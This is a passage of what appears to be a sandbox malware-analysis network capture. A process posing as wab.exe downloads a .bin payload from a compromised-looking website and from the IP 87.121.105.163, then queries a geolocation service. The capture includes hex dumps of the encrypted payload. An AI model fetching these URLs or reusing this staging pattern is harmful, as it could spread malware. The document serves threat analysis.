                                                                              Data Ascii: QXWaMpjDtbJJIWAIa53EsJJM6Pl130b/LCWu0/k4FjSkkTNtIVu/0Lk+JAL1knFVA+5MSXdAjOodeBijXxv/aDDwUEj3ri2h9HzEL83CIgc7IJ3QWUXQ0J0XkxD21nIdyL+PmTFd+kDFckirpRTbzWkY3fFZ8xYljMbWmN9nrYR7oJ3QWUXGv1DVRsr5OFd6kj6zbWVr5pU5OGLEcmFHN/s901z+C+HOGs3fvu/nP363GabC2Zk
May 2, 2024 17:20:58.019958973 CEST | 1289 | IN | Data Raw: 6b 4b 54 4f 2f 69 38 77 75 4e 41 46 69 4d 43 7a 71 6c 4f 6a 6c 34 62 56 33 44 6c 4d 53 66 4e 59 4d 69 38 5a 70 36 33 51 4f 57 7a 58 64 42 59 6c 62 61 74 55 48 79 71 70 37 66 6a 73 4b 4c 61 55 55 67 6f 4a 61 36 55 53 66 70 30 73 4b 6a 6b 42 77 6e
                                                                              Data Ascii: kKTO/i8wuNAFiMCzqlOjl4bV3DlMSfNYMi8Zp63QOWzXdBYlbatUHyqp7fjsKLaUUgoJa6USfp0sKjkBwn+UfQyoUWfN4DLro2a8plz7CoFgtBX1vaOK1Sx8CF8BWRa735LRNKix3eTGzYQ6peWZTx72UXTGtqk9LIZRcUx6dJzXdBJK9zNZZ4Z3ZO5LE1r6+OLx1hw5HKDHZg5J4ySHFl/d1F0MqHHk7eA5KeOWFGDtANrm7m9
May 2, 2024 17:20:58.019995928 CEST | 1289 | IN | Data Raw: 68 2f 33 6f 53 6e 68 52 47 61 68 5a 37 7a 57 55 58 35 39 54 39 4a 36 39 66 53 39 70 30 71 6b 71 64 48 54 77 56 57 30 41 4b 58 33 5a 69 4c 78 4c 67 6c 56 57 46 49 30 78 6d 64 72 2b 78 6d 72 5a 53 57 37 50 44 52 58 45 35 62 34 32 41 68 49 68 6c 76
                                                                              Data Ascii: h/3oSnhRGahZ7zWUX59T9J69fS9p0qkqdHTwVW0AKX3ZiLxLglVWFI0xmdr+xmrZSW7PDRXE5b42AhIhlv+TWSw5hYwJcJBri9KibRW9x9u+mwWLWnXbq1z11uPV61v4vcHgyqHa40LLNtBKqlY3k4AEECXwa3+zxRX34Lo8wQidAeWClNMggCUKrQIZp8NWWfQbrj6pzjnmTd8ddeemdxeCO9SG36qdbHvklF0xD5O2Kq102Q8
May 2, 2024 17:20:58.020028114 CEST | 1289 | IN | Data Raw: 7a 53 50 4e 73 6a 67 34 2b 6c 50 6b 2f 6a 73 65 31 51 41 66 2b 44 65 4b 47 54 48 6b 35 46 54 58 74 78 72 4e 73 4e 6e 46 79 7a 7a 73 4c 4b 4a 66 4a 4f 72 38 71 57 6d 45 6a 41 6e 73 41 51 33 33 67 6d 79 4f 37 61 49 30 41 59 51 2b 5a 41 31 59 6c 4d
                                                                              Data Ascii: zSPNsjg4+lPk/jse1QAf+DeKGTHk5FTXtxrNsNnFyzzsLKJfJOr8qWmEjAnsAQ33gmyO7aI0AYQ+ZA1YlM69Ol6pfsYfOO804kwdyOhiTkNlnslLZxdM+5mgJ381r1Vi45ZhaKRM1Ha1SKy9UIXxiXKeTHLQkw799n6vlyKiZzQp1c0cAlA7UlNKRUuie2eNPyw4er3+F7E9IlMFLWthKgXfRUbjeeiKNZzJS2cXTMrQP05DZal
May 2, 2024 17:20:58.186374903 CEST | 1289 | IN | Data Raw: 6b 4e 6c 6e 71 38 51 37 6f 70 77 51 57 55 58 51 30 4b 57 53 45 78 44 30 70 70 6f 67 6a 77 43 59 59 70 4f 46 69 6c 33 78 7a 6e 33 51 47 6f 37 6d 6f 4a 59 78 58 65 6b 2f 59 4d 36 6a 31 45 4a 58 74 64 30 57 52 62 58 4f 6b 43 51 50 2b 79 61 32 6b 4a
                                                                              Data Ascii: kNlnq8Q7opwQWUXQ0KWSExD0ppogjwCYYpOFil3xzn3QGo7moJYxXek/YM6j1EJXtd0WRbXOkCQP+ya2kJlF8WaNJzB1WQXTI9hK/jnYaX/hUH8AvUztwvcB7psiP6Y7ouUf8V9KtJTECHLKLhFMpoSaBSzkz2e2RNnF0wQ3i2OW7uWv23S6xvClgM4p+xB0MqDHlLe4O0wSk2smMvt7zFlD/PF+29VByXgzBLGtUz2HEy4s488


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.44974846.254.34.12808872C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 2, 2024 17:21:54.182235956 CEST207OUTGET /wnnSAFMWPwDXGy95.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: www.duelvalenza.it
                                                                              Connection: Keep-Alive
                                                                              May 2, 2024 17:21:54.369524002 CEST  592  IN  HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 02 May 2024 15:21:54 GMT
                                                                              Server: Apache
                                                                              Location: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/
                                                                              Cache-Control: max-age=1800
                                                                              Expires: Thu, 02 May 2024 15:51:54 GMT
                                                                              Content-Length: 255
                                                                              Keep-Alive: timeout=1, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 77 6e 6e 53 41 46 4d 57 50 77 44 58 47 79 39 35 2e 62 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/">here</a>.</p></body></html>
                                                                              May 2, 2024 17:21:54.369935989 CEST  208  OUT  GET /wnnSAFMWPwDXGy95.bin/ HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: www.duelvalenza.it
                                                                              Connection: Keep-Alive
                                                                              May 2, 2024 17:21:54.579665899 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                              Date: Thu, 02 May 2024 15:21:54 GMT
                                                                              Server: Apache
                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              Cache-Control: post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Set-Cookie: PHPSESSID=d979cfhj3obh8us97avdsfs160; path=/
                                                                              Set-Cookie: FrontSession=3c980817fa90cc22daee2c4e083b8971; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/
                                                                              Set-Cookie: FrontSession=7d75569e99f6cec2e2439fa4dd313439; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/
                                                                              Last-Modified: Thu, 02 May 2024 15:21:54 GMT
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: private, must-revalidate
                                                                              Keep-Alive: timeout=1, max=99
                                                                              Connection: Keep-Alive
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html;charset=UTF-8
                                                                              Data Raw: 33 30 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 64 6f 63 75 6d 65 6e 74 2d 6c 6f 61 64 69 6e 67 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 3c 6d 65 74 61 20 63 6c 61 73 73 3d 76 69 65 77 70 6f 72 74 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 [TRUNCATED]
                                                                              Data Ascii: 3045<!DOCTYPE html><html lang=en class=document-loading><head><meta charset=UTF-8 /><meta class=viewport name=viewport content="width=device-width, initial-scale=1.0" /><meta name=format-detection content="telephone=no" /><meta http-equiv=X-UA-Compatible content="IE=edge" /><title>Page not found</title><meta name=description content="" /><meta property="og:title" content="Page not found" /><meta property="og:description" content="" /><meta property="og:url" content="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/" /><meta property="og:locale" content=en_EN /><meta prope
                                                                              May 2, 2024 17:21:54.579684973 CEST  1289  IN  Data Raw: 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 31 37 31 34 36 36 33 33 31 34 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 72 6f 62 6f 74 73 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f
                                                                              Data Ascii: rty="og:updated_time" content=1714663314 /><meta name=robots content="index, follow" /><link rel=icon type="image/x-icon" href="/assets/theme/icons/favicon.ico" /><link rel="shortcut icon" type="image/x-icon" href="/assets/theme/icons/favicon.
                                                                              May 2, 2024 17:21:54.579696894 CEST  1289  IN  Data Raw: 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 77 69 64 65 33 31 30 78 31 35 30 6c 6f 67 6f 20 63 6f 6e 74 65 6e 74 3d 22 2f 61 73 73 65 74 73 2f 74 68 65 6d 65 2f 69 63 6f 6e 73 2f 69 63 6f
                                                                              Data Ascii: 0.png" /><meta name=msapplication-wide310x150logo content="/assets/theme/icons/icon-ms-310-150.png" /><meta name=msapplication-square310x310logo content="/assets/theme/icons/icon-ms-310.png" /><meta name=msapplication-TileColor content="#FFFFF
                                                                              May 2, 2024 17:21:54.579710007 CEST  1289  IN  Data Raw: 65 78 74 2d 72 69 67 68 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 68 65 61 64 65 72 2d 73 6f 63 69 61 6c 3e 3c 61 20 63 6c 61 73 73 3d 73 6f 63 69 61 6c 2d 66 61 63 65 62 6f 6f 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63
                                                                              Data Ascii: ext-right"><div class=header-social><a class=social-facebook href="https://www.facebook.com/duelvalenzasrl" title="Follow us on Facebook" target=_blank><i class="fa fa-facebook"></i></a><a class=social-twitter href="https://twitter.com/duelval
                                                                              May 2, 2024 17:21:54.579716921 CEST  1289  IN  Data Raw: 6e 64 69 6e 67 73 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 64 69 61 6d 6f 6e 64 22 3e 3c 2f 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 64 72 6f 70 62 74 6e 3e 46 69 6e 64 69 6e 67 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                                              Data Ascii: ndings><i class="fa fa-diamond"></i><span class=dropbtn>Findings</span></a></li><li><a href="http://www.duelvalenza.it/en/services/no-title-2/" title=Casting><i class="fa fa-cube"></i><span class=dropbtn>Casting</span></a></li><li><a href="htt
                                                                              May 2, 2024 17:21:54.579766989 CEST  1289  IN  Data Raw: 65 49 6e 44 6f 77 6e 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 65 6e 2f 22 20 74 69 74 6c 65 3d 22 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61
                                                                              Data Ascii: eInDown"><li><a href="http://www.duelvalenza.it/en/" title="">Home</a></li><li class=active><span>Page not found</span></li></ul></div><div class=section-sep-bw></div></section><section class=section-content><div class=container><div class=tex
                                                                              May 2, 2024 17:21:54.579791069 CEST  1289  IN  Data Raw: 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 22 3e 3c 2f 69 3e 3c 73 74 72 6f 6e 67 3e 45 2d 6d 61 69 6c 3a 3c 2f 73 74 72 6f 6e 67 3e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 6d 61 69
                                                                              Data Ascii: ></li><li><i class="fa fa-envelope"></i><strong>E-mail:</strong><br /><a href="mailto:&#105;&#110;&#102;&#111;&#64;&#100;&#117;&#101;&#108;&#118;&#97;&#108;&#101;&#110;&#122;&#97;&#46;&#105;&#116;">&#105;&#110;&#102;&#111;&#64;&#100;&#117;&#10
                                                                              May 2, 2024 17:21:54.579857111 CEST  1289  IN  Data Raw: 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 73 65 63 74 69 6f 6e 3e 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 66 6f 6f 74 65 72 2d 63 6f 70 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63
                                                                              Data Ascii: </div></div></div></section><section class=footer-copy><div class=container><div class=row><div class=col-sm-9><p> Duel srl. 2024. All Rights Reserved |<a data-box data-box-ajax="http://www.duelvalenza.it/en/company-informations/?content=1
                                                                              May 2, 2024 17:21:54.579869986 CEST  1289  IN  Data Raw: 64 69 76 20 63 6c 61 73 73 3d 62 65 65 2d 6f 66 66 63 61 6e 76 61 73 3e 3c 6e 61 76 20 64 61 74 61 2d 6f 66 66 63 61 6e 76 61 73 2d 62 61 72 3d 6d 61 69 6e 20 63 6c 61 73 73 3d 62 65 65 2d 6f 66 66 63 61 6e 76 61 73 2d 62 61 72 3e 3c 64 69 76 20
                                                                              Data Ascii: div class=bee-offcanvas><nav data-offcanvas-bar=main class=bee-offcanvas-bar><div class=bee-offcanvas-content><ul class="nav navbar-nav"><li><a href="http://www.duelvalenza.it/en/" title="">Home</a></li><li><a href="http://www.duelvalenza.it/e
                                                                              May 2, 2024 17:21:54.579886913 CEST  1289  IN  Data Raw: 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 22 20 74 69 74 6c 65 3d 4e 65 77 73 3e 4e 65 77 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76
                                                                              Data Ascii: /li></ul></li><li><a href="" title=News>News</a></li><li><a href="http://www.duelvalenza.it/en/contacts/" title=Contacts>Contact us</a></li></ul></div></nav></div><div id=scripts><script type="text/javascript" src="//cdn.ene.si/jquery/1.11.1/j
                                                                              May 2, 2024 17:21:54.764233112 CEST  191  IN  Data Raw: 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6c 69 62 2f 62 65 65 72 73 2f 62 65 65 72 73 2e 6d 69 6e 2e 6a 73 22 3e
                                                                              Data Ascii: .js"></script><script type="text/javascript" src="/assets/lib/beers/beers.min.js"></script><script type="text/javascript" src="/assets/theme/js/global.js"></script></div></body></html>0


                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                              2  192.168.2.4  49749  87.121.105.163  80  8872  C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                              May 2, 2024 17:21:55.046840906 CEST  179  OUT  GET /wnnSAFMWPwDXGy95.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: 87.121.105.163
                                                                              Cache-Control: no-cache
                                                                              May 2, 2024 17:21:55.215075970 CEST  1289  IN  HTTP/1.1 200 OK
                                                                              Date: Thu, 02 May 2024 15:21:55 GMT
                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                              Last-Modified: Tue, 30 Apr 2024 00:33:24 GMT
                                                                              ETag: "78c40-617458488bd00"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 494656
                                                                              Content-Type: application/octet-stream
                                                                              Data Raw: d4 96 b1 5a 3b a9 6d 05 ba 72 ad d0 8b 51 db 10 b3 55 f0 9a 95 90 68 4e a0 98 16 79 a7 0b e8 74 92 b6 e8 76 8b 42 59 44 1a 98 d4 9e 44 95 cd e7 09 ba e7 af 52 e2 6b d9 ad c7 c2 43 67 0f 40 bc 11 d4 ba 3f 90 cc e7 f9 7a 90 a0 ef ca 45 8c 41 7d d4 f8 82 bb 46 37 14 d3 6e 2e 05 8f 02 ea 4d 58 02 69 9b 46 96 dd d2 18 43 67 54 29 b6 48 b1 b8 ae 10 d5 41 bf 46 26 84 34 ab fd a8 35 e7 93 15 a9 06 1a 35 94 08 36 d3 da 57 a7 f9 a3 64 08 b6 46 1d 01 58 66 59 e9 95 60 9d 7e 65 b1 6c 15 c4 cd 1d e6 21 4e 53 e1 11 d2 2b 95 ce 78 d8 3d b5 c3 8f 33 e0 ba 25 8c f5 a5 84 3d df be cc 03 8d f3 59 6c 59 d4 7f 0b 18 04 d4 cf 7a 48 7f f5 7f fb 54 23 22 6f 99 66 9f 59 3d ae dc 09 ca 48 ed 26 03 30 ed 79 82 b4 aa d4 58 3d e5 91 81 d8 e5 b5 f8 4e 95 e7 69 36 ec 90 e0 39 5e b7 62 a4 e2 ba 83 aa 9d 06 1e 38 74 96 e4 4c 26 89 6b 14 d8 8f 9f 1c 04 23 10 6b 20 46 30 8e a0 ee 4e 88 1d ec d8 46 20 fc 76 e9 3e c8 b4 29 cc e3 85 0e 58 0b 08 53 89 32 a0 48 8a 81 06 1e db 71 f7 9c 4c 6b ce 4d fd 3d 3d db 79 41 10 81 ed 33 a7 11 1d af [TRUNCATED]
                                                                              Data Ascii: Z;mrQUhNytvBYDDRkCg@?zEA}F7n.MXiFCgT)HAF&4556WdFXfY`~el!NS+x=3%=YlYzHT#"ofY=H&0yX=Ni69^b8tL&k#k F0NF v>)XS2HqLkM==yA3&=Hm}4S$y!}vs4 Sg&\RL;P1Tn7z)"].VcTHg0F'akew]~/=11lb[4 SIW^h}L4GrISL!{4}58]teE>K/W%5_\`E6^w_>#_mp?!EJaF,h)I&XP"uo~xZtSCIqFn"P) so]#%P_QiN=fKw,"cVDMVQ:}@whfUWa"pE^z`AifY+yUyS2;itZo;&R8vU|^Z. EcOQWTM\C5|:a'OU3|g`fnAE1hmXO(kj;}X_MM-)YZP^T5'Q\[+NFU5FH]xgguk5(ZewX"n [TRUNCATED]
                                                                              May 2, 2024 17:21:55.215091944 CEST  1289  IN  Data Raw: 67 ef ec c3 f5 13 9a 9e 74 f7 12 97 a3 40 76 e8 c5 67 8e 87 2b a5 6a 58 83 01 6d 06 88 26 bf 71 15 48 b2 89 27 87 33 26 db 23 e1 56 b0 28 74 9b 27 b7 6e c9 3e 90 72 86 94 ae 8f 04 3e 39 92 6b 85 34 0c d1 f2 4b ca 49 f6 71 f0 2d eb 10 87 47 0b 4d
                                                                              Data Ascii: gt@vg+jXm&qH'3&#V(t'n>r>9k4KIq-GMa!bK?Od(4Pu|31Af<`n-}:*IOX.QHdh4<{{HJiPpE%7};1S,BymjC-:Y:
                                                                              May 2, 2024 17:21:55.215205908 CEST  1289  IN  Data Raw: e2 11 a5 7a be 25 57 d4 f9 5f 89 59 b9 08 97 26 e8 8b 7d b2 77 51 31 c4 b9 d3 8c e6 2a 20 e2 e7 35 9e 33 65 e2 5a 3c 8d b3 81 cb 01 bf 5a 16 d5 8f 44 b7 2e 59 d8 c6 3a 6d 09 f0 e4 d3 d3 62 8e 31 4d 04 5b 31 b1 fa 87 bc 66 56 e8 e0 5f 98 fb f2 29
                                                                              Data Ascii: z%W_Y&}wQ1* 53eZ<ZD.Y:mb1M[1fV_)=-V>T]2wcv+ smh5_u{F-,=D9DQcWF[]_P6az`4:7DdAOE>Y~:5vKnfAi){?tQ0q6ZRRKxqLv
                                                                              May 2, 2024 17:21:55.215218067 CEST  1289  IN  Data Raw: 21 48 dd d0 a1 83 26 f3 f0 83 5f 4a 5a 12 5f 87 fb 20 82 af a5 2b 36 0a 3c b1 00 11 01 94 17 1d 2e b6 09 00 d5 b3 82 e5 20 bc b1 db f1 40 25 53 55 8e ba 7e 7a 0c a2 80 52 0b f6 ab 7e b0 bd 69 a2 e8 99 05 18 1d be 00 df 17 51 dc 3f 41 c7 66 40 36
                                                                              Data Ascii: !H&_JZ_ +6<. @%SU~zR~iQ?Af@6f*EbNAU~!I$smN{f4Wg_YnCC:R_ZejR~2E:jB0-zaMa`!LGo\*%8|f1C
                                                                              May 2, 2024 17:21:55.215229988 CEST  1289  IN  Data Raw: a8 e1 c9 02 f1 40 f3 a3 0a a1 c5 cd fb 29 59 e7 8c 30 50 1d c5 69 5d 92 c5 bd 2c 36 27 51 36 5b cf c3 10 6b 18 e3 4e 85 cb de 4e 5f 66 cd 41 40 a2 d6 17 b3 83 b1 3d 74 a5 e2 f4 19 f1 64 75 6b be 79 c0 74 58 05 65 27 23 5a 15 c5 b6 58 f9 72 0f 9f
                                                                              Data Ascii: @)Y0Pi],6'Q6[kNN_fA@=tdukytXe'#ZXryi-Uh_{6y?E&c4+ZqCCa3&#V;"#&Q(I4a76:>x3GSs$wOdLT!?%(x&
                                                                              May 2, 2024 17:21:55.215240955 CEST  1289  IN  Data Raw: d6 3c 95 c5 5c 47 2f 6d c5 cc 87 3b 22 41 a8 a8 42 bb 83 0e 9a be be 0a b1 53 94 d7 62 3f 64 e9 bb 11 5d ec b7 7d 10 22 ae fe b0 48 25 8c d6 bb aa ec fc cb 1b ca b9 fb db 16 70 be 6a 66 79 fd 6e de 17 02 15 67 bc e4 f0 3d 02 9e f6 e2 16 c6 31 0c
                                                                              Data Ascii: <\G/m;"ABSb?d]}"H%pjfyng=1lWFOOH"?C}mMR(&==0wdfdR:q*w#OA8w/6S&*m[QK>ejax_f~YT$t84+%ak))iw
                                                                              May 2, 2024 17:21:55.215358019 CEST  1289  IN  Data Raw: 0f b4 24 ae a4 eb ad 03 d4 2b 6d 0e 0c d0 71 9b 90 57 ac 7d 81 6e d7 34 3a 87 de 93 23 51 4b 8b 3e 24 e6 63 f6 82 0e 0a c9 fa 9a 45 54 f7 4a 1b 71 54 75 50 1d 2e 48 dc d3 15 cd a1 27 d3 8d cf 13 9f a7 7a 08 c3 22 6d 91 19 d5 b2 ef 0b 59 c6 6b 70
                                                                              Data Ascii: $+mqW}n4:#QK>$cETJqTuP.H'z"mYkphvfiE?726{.D]8po1`k$:@#wLI7I/]O&WU2T!T|wfZ3Q=x~xY UHSEHY"u|e
                                                                              May 2, 2024 17:21:55.215394020 CEST  1289  IN  Data Raw: 2f be d1 3e dc f8 f8 a9 15 eb 80 90 f8 fa bc 2a ba a1 72 89 3d d6 b8 52 46 52 4e 6c 12 91 d0 a3 49 8b 99 02 6f a7 98 df 28 06 72 36 86 da 59 97 07 a6 04 94 89 bb 23 61 57 d8 ea 45 96 8a 94 1b 9a 91 85 4d 86 b2 81 fa e7 5c 1a f7 f5 a6 95 11 1f ed
                                                                              Data Ascii: />*r=RFRNlIo(r6Y#aWEM\a_Xc7fnmXO)2@Sl9!L4r\7mrhJ>`0.j>2lS[Ps+/.(M8J`;
                                                                              May 2, 2024 17:21:55.215446949 CEST  1289  IN  Data Raw: 1e 6e 2e 05 df 89 24 a5 e7 f4 96 64 ad a9 50 97 08 13 ea 19 3d 5e ca b1 b8 ae 40 58 0c af ae 4f 84 34 ab ad 35 71 ef c3 96 fb b0 fc 54 20 01 fb a2 ef 13 17 bf 4c 60 88 ae c4 c2 8e 7a 84 73 93 1c 41 bd 1d 04 8f 89 b4 58 35 7c 83 01 b7 e0 d1 ba 5e
                                                                              Data Ascii: n.$dP=^@XO45qT L`zsAX5|^w7"yn=jq:=&jI\hH>(RROP2-06CbapiQI;4_GoN&r5CdTM(KlwPp$&Ml9$
                                                                              May 2, 2024 17:21:55.215461969 CEST  1289  IN  Data Raw: 2c c0 f6 f3 b4 07 c7 d9 99 b6 0b 4c 30 5e cb a8 58 97 18 bd cc f9 dc 2b fe 1c 40 5e 5d bc d4 8f 8c cb 1c 2b 38 cc a9 a5 83 08 eb 32 9b 05 1e 04 bc 04 51 8b 29 24 a6 43 a6 3d 43 c1 d1 d8 53 40 05 b6 7c eb 6c 4a dc aa 9c 81 7e 1b dc d1 7d 0c e0 11
                                                                              Data Ascii: ,L0^X+@^]+82Q)$C=CS@|lJ~}rRv&AN#:lGE-Z9gq|=~Ul\p!qoX#VmMl,mzOB.+-DZk3XRiv4/o$Zm_
                                                                              May 2, 2024 17:21:55.381963968 CEST  1289  IN  Data Raw: a9 38 5e 61 d6 37 c6 73 e8 a2 d1 15 77 4e ed 5a a4 ae d6 1d ef 14 fd cd c3 67 af e3 5c 54 49 22 92 26 4d 69 53 aa c2 99 48 d8 94 b4 7c 54 5d 62 dd e9 9f 1b 6f dd ac 11 2d 6d 77 e5 b2 dd 1d 1e c1 7e cf 32 28 51 88 a5 e1 b6 f1 02 49 83 35 b4 b1 76
                                                                              Data Ascii: 8^a7swNZg\TI"&MiSH|T]bo-mw~2(QI5vE ry~j1g'MATRLJ9zl\t}VgzaPf`LRRPPLvH[S$ zz_!-R](v)Q[e^~fs>}}


                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                              3  192.168.2.4  49754  178.237.33.50  80  8872  C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                              May 2, 2024 17:22:04.237040043 CEST  71  OUT  GET /json.gp HTTP/1.1
                                                                              Host: geoplugin.net
                                                                              Cache-Control: no-cache
                                                                              May 2, 2024 17:22:04.409076929 CEST  1173  IN  HTTP/1.1 200 OK
                                                                              date: Thu, 02 May 2024 15:22:04 GMT
                                                                              server: Apache
                                                                              content-length: 965
                                                                              content-type: application/json; charset=utf-8
                                                                              cache-control: public, max-age=300
                                                                              access-control-allow-origin: *
                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 